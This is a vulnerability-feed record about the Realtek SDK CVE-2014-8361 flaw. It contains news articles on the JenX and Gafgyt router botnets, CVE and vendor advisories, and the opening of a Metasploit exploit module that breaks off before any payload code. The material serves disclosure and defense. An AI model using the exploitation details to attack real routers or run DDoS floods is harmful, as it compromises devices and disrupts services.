infamously managed to take down Dyn, a DNS hosting provider that supports some of the world\u2019s largest websites.\n\nThe vulnerabilities in question are [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) and[ CVE-2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>), which affect certain Huawei and Realtek routers, Radware researcher Pascal Geenens [said in a blog post](<https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/>).\n\nRadware\u2019s inquiry into the botnet led it to a command-and-control server hosted at the site San Calvicie, which offers not only multiplayer mod support for Grand Theft Auto: San Andreas, but also DDoS attacks for a fee.\n\nEnthusiasts of the venerable videogame series, which places players in an immersive 3-D world of violence and vicarious thrills, have created an extensive universe of add-on features and tweaks, or \u201cmods,\u201d in the name of enriching and extending their experience. Sites such as San Calvicie cater to GTA gamers who want to host their own [custom versions of GTA](<https://www.gta5-mods.com/>) for multiplayer action.** \n**\n\n\u201cThe Corriente Divina (\u2018divine stream\u2019) option is described as \u2018God\u2019s wrath will be employed against the IP that you provide us,\u201d Geenens wrote of the site\u2019s DDoS offering. \u201cIt provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a \u2018Down OVH\u2019 option which most probably refers to attacks targeting the hosting service of [OVH](<https://www.ovh.com/>), a cloud hosting provider that also was a victim of the original [Mirai](<https://blog.radware.com/security/2016/10/busybox-botnet-mirai/>) attacks back in September 2016. OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.\u201d\n\nShortly after Geenens made his initial discovery, he returned to the site and found that the terms of engagement had changed. Now the listing included a reference to \u201cbots,\u201d and offered a DDoS volume of between 290 and 300 Gbps, for the same low price of $20 a pop.\n\nWhile derived from established code, the San Calvicie-hosted botnet, which Geenens has dubbed \u201cJenX\u201d, is deployed in a different manner than its predecessors.\n\n\u201cUntypical for IoT botnets we have witnessed in the past year, this botnet uses servers to perform the scanning and the exploits,\u201d he wrote. \u201cNearly all botnets, including [Mirai](<https://blog.radware.com/security/2016/11/insight-into-mirais-source-code/>), [Hajime](<https://blog.radware.com/security/2017/04/hajime-futureproof-botnet/>), Persirai, [Reaper](<https://blog.radware.com/security/2017/10/iot_reaper-botnet/>), Satori and Masuta perform distributed scanning and exploiting. That is, each victim that is infected with the malware will perform its own search for new victims. This distributed scanning provides for an exponential growth of the botnet, but comes at the price of flexibility and sophistication of the malware itself.\u201d\n\nThe centralized approach employed by JenX trades slower growth for lower detection, he added.\n\nThe danger from JenX should be mostly confined to GTA San Andreas users, Gessens said, but with a stern caveat.\n\n\u201c[T]here is nothing that stops one from using the cheap $20 per target service to perform 290 Gbps attacks on business targets and even government related targets,\u201d he wrote. \u201cI cannot believe the San Calvicie group would oppose to it.\u201d\n\nRadware filed abuse notifications related to JenX, resulting in a partial takedown of the botnet\u2019s server footprint, but it remains active. JenX\u2019s implementation makes taking it down a tricky task.\n\n\u201cAs they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones,\u201d he wrote. \u201cThese providers do not care about abuse. Some are even providing hosting services from the Darknet. If the exploit servers would be move to the Darknet, it would make it much more difficult to track down the servers\u2019 location and take them down.\u201d\n", "modified": "2018-02-02T13:32:17", "published": "2018-02-02T13:32:17", "id": "THREATPOST:D01E39B118AD961C99A79B4280C13B6A", "href": "https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/", "type": "threatpost", "title": "JenX Botnet Has Grand Theft Auto Hook", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-09T11:36:53", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2017-18368"], "description": "A new Gafgyt variant is adding vulnerable internet of things (IoT) devices to its botnet arsenal and using them to cripple gaming servers worldwide.\n\nThe newly-discovered variant is capable of launching a variety of denial-of-service (DoS) attacks against the Valve Source Engine, a video game engine developed by Valve Corp. that runs popular games such as \u200bHalf-Life and \u200bTeam Fortress 2. Other gaming servers have also been targeted by the botnet, such as those hosting widely-played games such as Fortnite, researchers warn.\n\n\u201cThis Gafgyt variant is a competing botnet to the \u200b[JenX botnet](<https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/>), which also uses remote code-execution exploits to gain access and recruit routers into botnets to attack gaming servers \u2013 most notably those running the Valve Source Engine \u2013 and cause a denial-of-service,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 research team, in [analysis released Thursday](<https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/>). \u201cThis variant also competes against similar botnets, which we have found are frequently sold on Instagram.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nGafgyt, a [botnet that was uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>), has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. The newest Gafgyt variant targets two of the same small-office router remote-code-execution flaws as its predecessor, \u200bJenX, which was disclosed in 2018\u200b.\n\nThe two previously-targeted flaws are CVE-2017-17215 (in the Huawei HG532) and CVE-2014-8361 (in the Realtek RTL81XX chipset). However, the newest variant also targets another vulnerability, CVE-2017-18368, a remote command-injection bug on Zyxel P660HN wireless routers. The Zyxel P660HN-T1A (distributed by TrueOnline) has a command-injection vulnerability in the remote system log forwarding function, which can be accessed by an unauthenticated user, researchers said.\n\nAccording to Shodan, there are more than 32,000 Wi-Fi routers worldwide that are vulnerable to these three flaws.\n\n## Infection and DoS\n\nThe Gafgyt variant first uses three \u201cscanners\u201d to attempt to exploit these known RCE flaws. Then, depending on the type of device targeted, the botnet makes them download either an ARM7 or MIPS binary using \u201cwget,\u201d which is a computer program that pulls content from web servers.\n\nFrom there, the malware connects to a command-and-control (C2) server, sending the device\u2019s information to join the botnet, such as IP address and architecture. From there, the victim device is forced to perform at least five different types of DoS attacks.\n\n\u201cThis Gafgyt variant can perform different types of DoS attacks simultaneously depending on the commands received from the C2 server,\u201d researchers said. \u201cThemain()function of the malware calls another function called processCmd() to process the command and initiate a corresponding attack.\u201d\n\nOne such attack calls the VSE function and contains a payload to attack game servers running the Valve Source Engine. Another calls the \u200bHTTPCF function to attack services security by Cloudflare; still other options target devices that may have been previously infected with competing botnets; or, they can call the endHTTP() function to start an HTTP flooding attack.\n\n\u201cAs previously described, the \u200bVSE command starts an attack against gaming servers running the Valve Source Engine,\u201d researchers said. \u201cNote that this is not an attack on the Valve corporation itself because anyone can run a server for these games on their own network. It is an attack on the servers.\u201d\n\n## Instagram Distribution\n\nUpon further investigation, researchers found several fake Instagram profiles selling the source code for the botnet at a wide range of prices.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/30162826/instagram.png>)\n\nAfter going undercover and interacting with these profiles, researchers were offered a \u201cspot\u201d in the botnet servers from $8 to $150 USD. A \u201cspot\u201d means that a person can pay attackers to add a set of IP addresses against which their already-working botnets will launch a DoS attack, researchers said.\n\nResearchers say they contacted Instagram and alerted them of malicious profiles. Instagram did not respond to a request for comment from Threatpost.\n\nLooking forward, researchers said that the Gafgyt variant shows the dangers of insecure IoT devices.\n\n\u201cIn short, an increase of IoT botnets sold on Instagram + low cost + RCE exploits + the presence of wireless routers across all industries means that IoT devices are at increased risk of being recruited into botnets,\u201d said researchers. \u201cThis formula shows why every type of industry must be aware of IoT security and implement measures to prevent devices on their network from getting compromised and degrading business continuity.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "modified": "2019-10-31T13:00:43", "published": "2019-10-31T13:00:43", "id": "THREATPOST:9CC8C9C750EB5EFD6E67DD7C0C8549FB", "href": "https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/", "type": "threatpost", "title": "Valve Source Engine, Fortnite Servers Crippled By Gafgyt Variant", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:17:10", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2018-14847", "CVE-2018-7900"], "description": "A vulnerability in some Huawei routers used for carrier ISP services allows cybercriminals to identify whether the devices have default credentials or not \u2013 without ever connecting to them.\n\nCVE-2018-7900 exists in the router panel and allows credentials information to leak \u2013 so attackers can simply perform a [ZoomEye](<https://www.zoomeye.org/>) or Shodan IoT search to find list of the devices having default passwords \u2013 no need for bruteforcing or running the risk of running into a generic honeypot.\n\n\u201cWhen someone has a look on the html source code of login page, few variables are declared. One of the variables contain a specific value. By monitoring this specific value, one can come to the conclusion that the device has the default password,\u201d explained Ankit Anubhav, principal researcher at NewSky Security, [in a posting](<https://blog.newskysecurity.com/information-disclosure-vulnerability-cve-2018-7900-makes-it-easy-for-attackers-to-find-huawei-3e7039b6f44f>) on Wednesday. \u201cThe attacker can simply go to ZoomEye, find a list of devices, login, and do what they want with minimal hacking skills. As easy as that.\u201d\n\nHuawei has issued a fix and worked with its carrier customers to implement it across networks.\n\nNewSky said it wouldn\u2019t disclose exact details of the flaw nor the numbers of affected devices that it uncovered during its own ZoomEye search (though Anubhav referred to the numbers of affected devices as \u201cconcerning\u201d).\n\nThis is only the latest issue affecting carrier-level gear \u2013 and it\u2019s a problematic trend given the scope of the potential attack surface.\n\n\u201cThe attack vectors which can infect a huge number of IoT devices are much favored than a using a vulnerability in a vendor which has only 500 devices online,\u201d said Anubhav. \u201cHence, in 2018 we saw [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) (MikroTik) and [CVE-2014-8361](<https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/>) are being highly used. One commonality among them is the sheer high number of devices which can be abused using the vulnerabilities. Hence, a security loophole in a big IoT vendor can be a more critical issue than a usual one.\u201d\n", "modified": "2018-12-20T20:41:46", "published": "2018-12-20T20:41:46", "id": "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C", "href": "https://threatpost.com/huawei-router-default-credential/140234/", "type": "threatpost", "title": "Huawei Router Flaw Leaks Default Credential Status", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T13:53:14", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2018-10561", "CVE-2021-24027"], "description": "Several variants of the Gafgyt Linux-based botnet malware family have incorporated code from the infamous Mirai botnet, researchers have discovered.\n\nGafgyt (a.k.a. Bashlite) is a [botnet that was first uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>). It targets vulnerable internet of things (IoT) devices like Huawei routers, Realtek routers and ASUS devices, which it then uses to launch large-scale distributed denial-of-service (DDoS) attacks. It also often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe latest variants have now incorporated several Mirai-based modules, according to research from Uptycs [released Thursday](<https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt>), along with new exploits. Mirai variants and its code re-use have become more voluminous since the source code for the IoT botnet [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\nThe capabilities nicked from Mirai include various methods to carry out DDoS attacks, according to the research:\n\n * HTTP flooding, in which the botnet sends a large number of HTTP requests to a targeted server to overwhelm it;\n * UDP flooding, where the botnet sends several UDP packets to a victim server as a means of exhausting it;\n * Various TCP flood attacks, which exploit a normal three-way TCP handshake the victim server receives a heavy number of requests, resulting in the server becoming unresponsive;\n * And an STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.\n\n\n\nCode comparison for the HTTP DDoS module between Gafgyt and Mirai. Click to enlarge. Source: Uptycs.\n\nMeanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.\n\nThe Huawei exploit ([CVE-2017-17215](<https://nvd.nist.gov/vuln/detail/CVE-2017-17215>)) and the Realtek exploit ([CVE-2014-8361](<https://nvd.nist.gov/vuln/detail/CVE-2014-8361>)) are both used for remote code execution (RCE), to fetch and download the Gafgyt payload, according to the analysis.\n\n\u201cThe Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using \u2018wget\u2019 command, fetches the payload,\u201d according to Uptycs. \u201c[It] gives the execution permission to payload using \u2018chmod\u2019 command, [and] executes the payload.\u201d\n\nThe GPON exploit ([CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>)) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.\n\n\u201cThe IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,\u201d researchers added.\n\n## **IoT Botnet Variants Abound**\n\nIoT botnets like Gafgyt are constantly evolving. For instance, researchers in March discovered what they said is the first variant of the Gafgyt botnet family [to cloak its activity](<https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/>) using the Tor network.\n\nMirai hasn\u2019t disappeared either: a [new variant of the botnet](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) was recently discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices. Since mid-February, the variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet.\n\nIt\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>). Last year, a version dubbed Mukashi was seen taking advantage of a pre-authentication command-injection vulnerability found in Zyxel NAS storage devices.\n\n\u201cMalware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,\u201d Uptycs researchers said.\n\nTo protect against these kinds of botnet infections, users should regularly monitor for suspicious processes, events and network traffic spawned on the execution of any untrusted binary, researchers recommended. And, users should keep all systems and firmware updated with the latest releases and patches.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "modified": "2021-04-15T16:35:53", "published": "2021-04-15T16:35:53", "id": "THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "href": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/", "type": "threatpost", "title": "Gafgyt Botnet Lifts DDoS Tricks from Mirai", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-12T14:58:56", "description": "Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-08T22:15:00", "title": "CVE-2021-22502", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-02-11T18:50:00", "cpe": ["cpe:/a:microfocus:operation_bridge_reporter:10.40"], "id": "CVE-2021-22502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-05T14:32:54", "description": "D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-02T13:15:00", "title": "CVE-2020-25506", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25506"], "modified": "2021-02-04T21:40:00", "cpe": ["cpe:/o:dlink:dns-320_firmware:2.06b01"], "id": "CVE-2020-25506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25506", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:12:57", "description": "Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123. After one is connected to this page, it is possible to execute system commands as root through the tracert diagnostic tool because of lack of user input sanitizing.", "edition": 8, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-07T23:15:00", "title": "CVE-2019-19356", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2020-02-14T17:15:00", "cpe": ["cpe:/o:netis-systems:wf2419_firmware:2.2.36123", "cpe:/o:netis-systems:wf2419_firmware:1.2.31805"], "id": "CVE-2019-19356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19356", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:netis-systems:wf2419_firmware:2.2.36123:*:*:*:*:*:*:*", "cpe:2.3:o:netis-systems:wf2419_firmware:1.2.31805:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:37:04", "description": "NETGEAR JGS516PE devices before 2.6.0.43 are affected by lack of access control at the function level.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-09T07:15:00", "title": "CVE-2020-26919", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26919"], "modified": "2020-10-19T14:23:00", "cpe": [], "id": "CVE-2020-26919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26919", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-04-09T10:50:58", "description": "The miniigd SOAP service in Realtek SDK allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.", "edition": 10, "cvss3": {}, "published": "2015-05-01T15:59:00", "title": "CVE-2014-8361", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2021-04-09T07:15:00", "cpe": ["cpe:/o:d-link:dir-605l_firmware:1.13", "cpe:/o:d-link:dir-600l_firmware:2.05", "cpe:/o:d-link:dir-905l_firmware:1.02", "cpe:/a:realtek:realtek_sdk:-", "cpe:/o:d-link:dir-600l_firmware:1.15", "cpe:/o:d-link:dir-809_firmware:1.02", "cpe:/o:d-link:dir-605l_firmware:2.04", "cpe:/o:d-link:dir-619l_firmware:2.03", "cpe:/o:d-link:dir-619l_firmware:1.15"], "id": "CVE-2014-8361", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8361", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:d-link:dir-619l_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-600l_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-605l_firmware:2.04:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-905l_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:a:realtek:realtek_sdk:-:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-619l_firmware:2.03:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-809_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-600l_firmware:2.05:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-605l_firmware:1.13:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-06-27T18:51:27", "bulletinFamily": "software", "cvelist": ["CVE-2014-8361"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-01-18T18:13:00", "published": "2018-01-18T18:13:00", "id": "F5:K57390658", "href": "https://support.f5.com/csp/article/K57390658", "title": "miniigd SOAP service in Realtek SDK vulnerability CVE-2014-8361", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2021-02-09T13:27:30", "bulletinFamily": "info", "cvelist": ["CVE-2021-22502"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the userName parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "edition": 1, "modified": "2021-02-09T00:00:00", "published": "2021-02-09T00:00:00", "id": "ZDI-21-153", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-153/", "title": "Micro Focus Operations Bridge Reporter userName Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-09T13:27:30", "bulletinFamily": "info", "cvelist": ["CVE-2021-22502"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Token parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "edition": 1, "modified": "2021-02-09T00:00:00", "published": "2021-02-09T00:00:00", "id": "ZDI-21-154", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-154/", "title": "Micro Focus Operations Bridge Reporter Token Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-06-22T11:40:05", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Realtek SDK. Authentication is not required to exploit this vulnerability. The specific flaw exists within the miniigd SOAP service. The issue lies in the handling of the NewInternalClient requests due to a failure to sanitize user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.", "modified": "2015-06-22T00:00:00", "published": "2015-04-24T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-155/", "id": "ZDI-15-155", "title": "(0Day) Realtek SDK miniigd AddPortMapping SOAP Action Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:29", "description": "", "published": "2015-05-29T00:00:00", "type": "packetstorm", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2015-05-29T00:00:00", "id": "PACKETSTORM:132090", "href": "https://packetstormsecurity.com/files/132090/Realtek-SDK-Miniigd-UPnP-SOAP-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude REXML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', \n'Description' => %q{ \nDifferent devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command \ninjection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, \nthere is no output for the executed command. This module has been tested successfully on a \nTrendnet TEW-731BR router with emulation. \n}, \n'Author' => \n[ \n'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery \n'Michael Messner 